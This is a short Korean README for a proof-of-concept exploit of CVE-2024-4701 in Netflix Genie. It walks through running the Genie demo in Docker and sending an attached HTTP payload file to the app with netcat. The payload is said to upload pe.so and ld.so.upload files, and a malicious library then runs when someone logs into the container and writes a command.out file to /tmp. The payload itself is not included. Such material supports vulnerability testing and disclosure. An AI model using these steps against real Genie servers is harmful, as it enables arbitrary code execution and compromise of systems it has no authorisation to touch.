
CVE-2024-4701용 POC
CVE-2024-4701용 POC
https://netflix.github.io/genie/docs/4.3.0/demo/docker-compose.yml 또는 이 저장소에서 genie docker 파일을 다운로드하세요.
실행하세요
docker-compose up
첨부된 http payload loadlib를 다운로드하세요.
다음 명령을 실행하세요.
nc -w 5 localhost 8080 < loadlib
netcat(nc)을 설치해야 할 수도 있습니다.
이 명령은 docker에서 실행 중인 genie 앱에 payload를 전송하며, 앱은 pe.so 및 ld.so.upload 파일을 업로드합니다.
그런 다음 genie-app docker 컨테이너에 로그인하세요.
docker exec -it genie_demo_app_4.3.0 /bin/bash
로그인하는 행위가 악성 라이브러리의 실행을 트리거하므로, 그런 다음 실행하세요.
ls /tmp/
디스크에 기록된 command.out 파일을 확인하려면.